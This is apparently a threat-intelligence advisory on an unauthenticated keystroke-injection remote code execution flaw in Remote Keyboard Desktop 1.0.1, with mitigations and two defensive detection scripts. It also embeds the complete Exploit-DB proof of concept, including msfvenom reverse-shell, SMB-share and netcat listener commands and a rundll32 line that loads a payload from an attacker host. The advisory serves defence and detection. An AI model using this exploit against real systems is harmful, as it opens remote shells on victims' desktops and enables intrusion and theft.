Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
AI Analysis
Technical Summary
Remote Keyboard Desktop 1.0.1 exposes a WebSocket service (default port 8080) that accepts keyboard events from any client that can reach it, with no authentication: the public proof of concept connects and starts sending events immediately. Each event is a JSON text frame of the form {"command": "keyboard_event", "data": {"key": "<KEY_NAME>", "keyDown": true|false, "capsLock": false}}, and the application injects it into the interactive desktop as if the key had been pressed locally. Because the keystrokes enter at the OS input layer, anyone who can reach the port can drive the logged-on user's session. The PoC (Exploit-DB 52299, Chokri Hammedi, 17 May 2025) turns that into remote code execution: it sends a Win+R chord to open the Run dialog, types a command one key at a time (holding SHIFT only around upper-case letters and using the application's NUMPAD_DIVIDE and NUMPAD_DECIMAL key names for "/" and "."), and presses RETURN. The typed command is rundll32.exe \\<attacker>\SHARE\<payload>.dll,ExportedFunc; a commented-out variant launches an .exe with cmd /c instead.

The PoC is a Python 3 script built on the websocket-client library. Its handshake mimics a Dart client (User-Agent: Dart/3.7 (dart:io) plus an Origin header pointing at the target), presumably to look like the vendor's own client. The payload is a reverse-shell DLL generated with msfvenom, served from an Impacket SMB server on the attacker's host, and fetched by the victim over SMB when rundll32 resolves the UNC path. Three caveats matter when assessing exposure: the shell runs with the privileges of the logged-on user, not SYSTEM, because rundll32 launched from the Run dialog inherits that user's token; an interactive session must be unlocked, since injected input goes to the foreground desktop and a locked workstation swallows it; and the victim must be able to reach the attacker's TCP port 445 (Windows also tries WebDAV for a UNC path if the WebClient service is running). No authentication is needed on the WebSocket side, and the only "user interaction" is a Run dialog that flashes on screen for about a second.

No vendor patch or mitigation is available at the time of writing, and no in-the-wild exploitation has been reported. The PoC was tested on Windows 10 Pro build 19045; other Windows builds running the same application are expected to be affected, because the weakness is in the application rather than the OS. The attack surface is every reachable instance of the WebSocket listener, normally port 8080, and exploitation additionally needs an attacker-controlled SMB share the victim can reach.
This attack is hard to spot with conventional network signatures because nothing in it is an exploit in the memory-corruption sense: the WebSocket traffic is ordinary JSON, and the resulting rundll32 process is a child of explorer.exe, exactly as it would be if the user had typed the command. What remains distinctive is the combination of a rundll32 or cmd launched from explorer.exe with a UNC path to a host that is not a known file server, followed by an outbound SMB connection from a workstation.
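The JSON key-event format described above lends itself to a small forensic decoder, which is what an analyst needs when a capture of port 8080 traffic has to be turned into "what was typed". The block below is an added example, not part of the Exploit-DB entry or the vendor's software: it replays keyboard_event frames in order, tracks SHIFT, caps lock and Windows-key chords, extracts whatever was typed into the Run dialog between a Win+R chord and RETURN, and pulls out the UNC paths the victim will fetch. The key names SPACE, NUMPAD_DIVIDE, NUMPAD_DECIMAL, SHIFT, LEFT_WINDOWS, RETURN and the literal backslash key come from the PoC; RIGHT_WINDOWS, CONTROL and ALT are assumed, and the sample capture is constructed here with a small builder rather than recorded from the application.

```python
"""Reconstruct typed input from captured Remote Keyboard Desktop WebSocket frames."""
import json
import re

# Key names for non-alphanumeric characters, taken from the PoC listing.
KEY_TO_CHAR = {
    "SPACE": " ",
    "NUMPAD_DIVIDE": "/",
    "NUMPAD_DECIMAL": ".",
    "\\": "\\",
    ",": ",",
    "RETURN": "\n",
}
# SHIFT and LEFT_WINDOWS appear in the PoC; the other names are assumptions.
MODIFIERS = {"SHIFT", "LEFT_WINDOWS", "RIGHT_WINDOWS", "CONTROL", "ALT"}
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\s]+")


def decode_events(frames):
    """Replay JSON text frames in order and return ('char', c) / ('chord', keys) events.

    SHIFT and caps lock only change letter case; any other held modifier turns the
    next key press into a chord such as ('LEFT_WINDOWS', 'R'). Key releases and
    non-keyboard commands are ignored.
    """
    held = []       # modifiers currently down, in press order
    events = []
    for raw in frames:
        msg = json.loads(raw)
        if msg.get("command") != "keyboard_event":
            continue
        data = msg["data"]
        key = data["key"]
        down = bool(data["keyDown"])
        caps = bool(data.get("capsLock", False))
        if key in MODIFIERS:
            if down and key not in held:
                held.append(key)
            elif not down and key in held:
                held.remove(key)
            continue
        if not down:
            continue
        chord_mods = [m for m in held if m != "SHIFT"]
        if chord_mods:
            events.append(("chord", tuple(chord_mods + [key])))
        elif key in KEY_TO_CHAR:
            events.append(("char", KEY_TO_CHAR[key]))
        elif len(key) == 1 and key.isalpha():
            upper = ("SHIFT" in held) != caps   # shift and caps lock cancel out
            events.append(("char", key.upper() if upper else key.lower()))
        else:
            events.append(("char", key))        # digits and anything unknown, verbatim
    return events


def run_dialog_commands(events):
    """Return the strings typed between a Win+R chord and the next RETURN."""
    commands, buf, collecting = [], [], False
    for kind, value in events:
        if kind == "chord":
            collecting = value == ("LEFT_WINDOWS", "R")
            buf = []
        elif collecting:
            if value == "\n":
                commands.append("".join(buf))
                collecting, buf = False, []
            else:
                buf.append(value)
    return commands


def unc_targets(commands):
    """UNC paths referenced by the recovered commands (what the victim will fetch)."""
    return [m.group(0) for cmd in commands for m in UNC_RE.finditer(cmd)]


def frame(key, down, caps_lock=False):
    """One keyboard_event text frame, in the format the PoC sends."""
    return json.dumps({"command": "keyboard_event",
                       "data": {"key": key, "keyDown": down, "capsLock": caps_lock}})


def frames_from_script(script):
    """Build a constructed capture: 'K+' holds K down, 'K-' releases it, 'K' taps it."""
    frames = []
    for item in script:
        if len(item) > 1 and item.endswith("+"):
            frames.append(frame(item[:-1], True))
        elif len(item) > 1 and item.endswith("-"):
            frames.append(frame(item[:-1], False))
        else:
            frames.extend([frame(item, True), frame(item, False)])
    return frames


# Constructed sample: Win+R, then "cmd /c \\1.2.3.4\s\Go.exe", then RETURN.
SAMPLE_SCRIPT = (
    ["LEFT_WINDOWS+", "R", "LEFT_WINDOWS-"]
    + ["C", "M", "D", "SPACE", "NUMPAD_DIVIDE", "C", "SPACE", "\\", "\\"]
    + ["1", "NUMPAD_DECIMAL", "2", "NUMPAD_DECIMAL", "3", "NUMPAD_DECIMAL", "4"]
    + ["\\", "S", "\\", "SHIFT+", "G", "SHIFT-", "O", "NUMPAD_DECIMAL", "E", "X", "E", "RETURN"]
)
SAMPLE_FRAMES = frames_from_script(SAMPLE_SCRIPT)


if __name__ == "__main__":
    events = decode_events(SAMPLE_FRAMES)
    cmds = run_dialog_commands(events)
    print("Run dialog commands:", cmds)
    print("UNC targets:", unc_targets(cmds))
```

Feed it the text payloads of the client-to-server WebSocket frames in capture order (for example exported from Wireshark's WebSocket dissector); the same decoder also reveals any other chords an intruder sent, since every non-SHIFT modifier combination is reported as a chord event.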
Potential Impact
For European organizations the exposure is full compromise of any workstation that runs the application and can be reached on the WebSocket port. An attacker obtains a shell as the logged-on user, which is enough for data theft, lateral movement, installation of persistent malware, ransomware staging or disruption of whatever that user can reach. Remote Keyboard Desktop is typically installed for convenience or accessibility, so instances are more likely to sit on ordinary user desktops than behind a managed remote-access gateway, and any instance reachable from a guest network, a flat office LAN or the internet is open to automated scanning now that working exploit code is public. Those desktops are where personal data protected under GDPR, intellectual property and cached credentials live, and operational downtime follows when affected hosts have to be rebuilt. Healthcare, finance, government and critical-infrastructure organisations are the usual high-value targets. The absence of a patch raises the urgency. The one structural limitation is that the public PoC needs the victim to reach an attacker-controlled SMB share: outbound port 445 is often blocked at the internet edge but rarely inside a flat network, and an attacker with any internal foothold can host the share there. The vulnerability therefore threatens the confidentiality, integrity and availability of affected systems and could serve as an initial-access step in larger campaigns against European enterprises.
Mitigation Recommendations
1. Identify and inventory every host running Remote Keyboard Desktop 1.0.1. The application is distributed through the Microsoft Store, so check installed Store (Appx) packages as well as the traditional software inventory.
2. Restrict access to the WebSocket port (default 8080) with host-based and network firewall rules, allowing only the trusted devices that are meant to control the desktop.
3. Uninstall or disable the application wherever it is not essential.
4. If it must be used, place the affected hosts in a segmented zone and block outbound SMB (TCP 445) and WebDAV from them to anything other than known file servers; the PoC depends on the victim fetching its payload from a UNC path.
5. Monitor for WebSocket connections to port 8080 from unexpected sources and for outbound SMB connections from workstations to hosts that are not file servers, especially to raw IP addresses.
6. Use EDR to alert on rundll32.exe or cmd.exe launched from explorer.exe with a UNC path on the command line; that is exactly what a Run-dialog launch of this payload produces.
7. Tighten SMB share access controls. Disabling SMBv1 is good hygiene but does not help against this exploit: the PoC server speaks SMB2 (-smb2support) and the victim is the SMB client, not the server.
8. Make IT staff aware that this class of remote-control tool injects input without authentication, and that exposing it is equivalent to leaving an unlocked keyboard on the network.
9. Keep all software current and watch the vendor's channels (https://remotecontrolio.web.app/) for a fixed release or guidance.
10. For NIDS, the PoC's handshake carries User-Agent: Dart/3.7 (dart:io) and its frames contain "command": "keyboard_event"; the legitimate client likely produces the same traffic, so match on those markers from sources outside an allowlist rather than on the markers alone.
These measures focus on network segmentation, access control and behavioural monitoring specific to the attack vector rather than generic patching advice.
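Items 5 and 6 above translate into a concrete rule. The block below is an added example, not from the Exploit-DB entry or any EDR product: it parses a handful of constructed process-creation records (Sysmon Event ID 1 field names, written here as key=value lines) and flags rundll32.exe or cmd.exe launches whose command line names a UNC path on a host that is not an allowlisted file server, annotating whether the parent is explorer.exe, which is what a Run-dialog launch looks like. The sample records, the trusted-host list and the key=value line format are constructed for the example.

```python
"""Flag rundll32/cmd launches that load code from a UNC path on an untrusted host."""
import re

# Binaries the PoC drives from the Run dialog (the exe variant uses cmd /c).
WATCHED_BINARIES = {"rundll32.exe", "cmd.exe"}
# key=value fields, quoted when the value contains spaces.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# \\host\share\... ; group 1 is the host.
UNC_RE = re.compile(r"\\\\([^\\\s\"']+)\\[^\s\"']+")

# Constructed sample records: one exploit launch, one legitimate install from a
# file server, one local rundll32, and one UNC launch from a non-interactive parent.
SAMPLE_EVENTS = [
    r'UtcTime="2025-06-10 21:04:06" Image=C:\Windows\System32\rundll32.exe '
    r'CommandLine="rundll32.exe \\192.168.8.101\SHARE\shell.dll,ExportedFunc" '
    r'ParentImage=C:\Windows\explorer.exe User=CORP\alice',
    r'UtcTime="2025-06-10 21:05:11" Image=C:\Windows\System32\cmd.exe '
    r'CommandLine="cmd /c \\fs01.corp.local\software\setup.exe" '
    r'ParentImage=C:\Windows\explorer.exe User=CORP\bob',
    r'UtcTime="2025-06-10 21:06:40" Image=C:\Windows\System32\rundll32.exe '
    r'CommandLine="rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL" '
    r'ParentImage=C:\Windows\explorer.exe User=CORP\alice',
    r'UtcTime="2025-06-10 21:07:02" Image=C:\Windows\System32\cmd.exe '
    r'CommandLine="cmd /c \\10.9.8.7\s\x.exe" '
    r'ParentImage=C:\Windows\System32\svchost.exe User="NT AUTHORITY\SYSTEM"',
]
TRUSTED_SHARE_HOSTS = {"fs01.corp.local"}   # constructed allowlist of file servers


def parse_event(line):
    """Turn one key=value record into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_remote_lolbin_launches(lines, trusted_hosts):
    """One finding per watched binary whose command line names a UNC path on an untrusted host."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        image = basename(ev.get("Image", ""))
        if image not in WATCHED_BINARIES:
            continue
        m = UNC_RE.search(ev.get("CommandLine", ""))
        if m is None:
            continue                      # local path: not this technique
        host = m.group(1).lower()
        if host in trusted_hosts:
            continue                      # known file server: expected traffic
        findings.append({
            "time": ev.get("UtcTime"),
            "user": ev.get("User"),
            "image": image,
            "host": host,
            "path": m.group(0),
            # Run-dialog launches are children of explorer.exe; that is what
            # keyboard injection through this application produces.
            "interactive_parent": basename(ev.get("ParentImage", "")) == "explorer.exe",
        })
    return findings


if __name__ == "__main__":
    for f in find_remote_lolbin_launches(SAMPLE_EVENTS, TRUSTED_SHARE_HOSTS):
        flag = "RUN-DIALOG" if f["interactive_parent"] else "NON-INTERACTIVE"
        print(f"{f['time']} {f['user']} {f['image']} -> {f['path']} [{flag}]")
```

The allowlist is the tuning knob: keep it to real file servers by hostname, so that a UNC path to a bare IP address, as the PoC uses, is always reported. A second signal worth correlating, outside this block, is a new SMB session from the same workstation to the same host within a second or two of the process start.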
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Belgium, Sweden, Finland
Indicators of Compromise
- exploit-code:

```python
# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045
#
# Start Remote Keyboard Desktop on your windows
#
# Preparing:
#
# 1. Generating payload (dll/exe). LHOST is the attacker host that runs the SMB
#    server and the listener (the `lhost` value below). The original listing used
#    192.168.8.105 here, which is the target address in the script, so the shell
#    would have connected back to the victim itself.
#    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.101 LPORT=8080 -f dll > shell.dll
# 2. Start smb server (serves the current directory as \\lhost\SHARE):
#    impacket-smbserver SHARE . -smb2support
# 3. nc -lnvp 8080
# 4. python exploit.py
#####
#!/usr/bin/env python3
import json
import time

import websocket  # pip install websocket-client

target = "192.168.8.105"   # victim running Remote Keyboard Desktop
lhost = "192.168.8.101"    # attacker host: SMB share and reverse shell listener
WS_URL = f"ws://{target}:8080/"
payload = "shell.dll"      # payload dll/exe filename; must match the file in the share
debug = False

# Handshake headers mimicking the Dart client the application expects.
HEADER_LIST = [
    "User-Agent: Dart/3.7 (dart:io)",
    f"Origin: http://{target}:8080",
    "Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits",
]

# SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}"  # exe based
SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc"  # dll based

# Characters that are not plain letters/digits, mapped to the app's key names
# and whether SHIFT is needed.
special_mapping = {
    ' ': ("SPACE", False),
    '/': ("NUMPAD_DIVIDE", False),
    '\\': ("\\", False),
    '.': ("NUMPAD_DECIMAL", False),
    ',': (",", False),
}


def send_key_event(ws, key, key_down):
    """One keyboard_event frame: the service injects it into the desktop."""
    event = {"command": "keyboard_event",
             "data": {"key": key, "keyDown": key_down, "capsLock": False}}
    ws.send(json.dumps(event))


def send_text(ws, text, delay=0.05):
    """Type `text` one key at a time, holding SHIFT only around upper-case letters."""
    shift_pressed = False
    for ch in text:
        if ch in special_mapping:
            key_name, need_shift = special_mapping[ch]
        elif ch.isalpha():
            need_shift = ch.isupper()
            key_name = ch.upper()
        elif ch.isdigit():
            key_name = ch
            need_shift = False
        else:
            raise ValueError(f"No key mapping for character: {ch!r}")
        if need_shift and not shift_pressed:
            send_key_event(ws, "SHIFT", True)
            shift_pressed = True
        elif not need_shift and shift_pressed:
            send_key_event(ws, "SHIFT", False)
            shift_pressed = False
        send_key_event(ws, key_name, True)
        send_key_event(ws, key_name, False)
        time.sleep(delay)
    if shift_pressed:
        send_key_event(ws, "SHIFT", False)


def send_key(ws, keys, delay=0.05):
    """Press a chord: keys down in order, then released in reverse order."""
    for key in keys:
        send_key_event(ws, key, True)
        time.sleep(delay)
    for key in reversed(keys):
        send_key_event(ws, key, False)


def on_open(ws):
    print("Let's start!")
    send_key(ws, ["LEFT_WINDOWS", "R"])   # open the Run dialog
    time.sleep(0.5)
    send_text(ws, SMB_PATH)
    send_key(ws, ["RETURN"])
    print("Executing...")
    time.sleep(1.2)
    print("Check your listener!")
    if debug:
        print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m ")
    ws.close()


def on_message(ws, message):
    if debug:
        print("[=] Received:", message)


def on_error(ws, error):
    if debug:
        print("[!] Error:", error)


def on_close(ws, code, reason):
    if debug:
        print(f"[x] Closed: {code} - {reason}")


if __name__ == "__main__":
    websocket.enableTrace(debug)
    ws = websocket.WebSocketApp(
        WS_URL,
        header=HEADER_LIST,
        on_open=on_open,
        on_message=on_message,
        on_error=on_error,
        on_close=on_close,
    )
    ws.run_forever()
```
Technical Details
- Edb Id: 52299
- Has Exploit Code: true
- Code Language: python
Threat ID: 68489dc67e6d765d51d532bc
Added to database: 6/10/2025, 9:04:06 PM
Last enriched: 6/11/2025, 8:24:31 AM
Last updated: 8/16/2025, 4:47:19 PM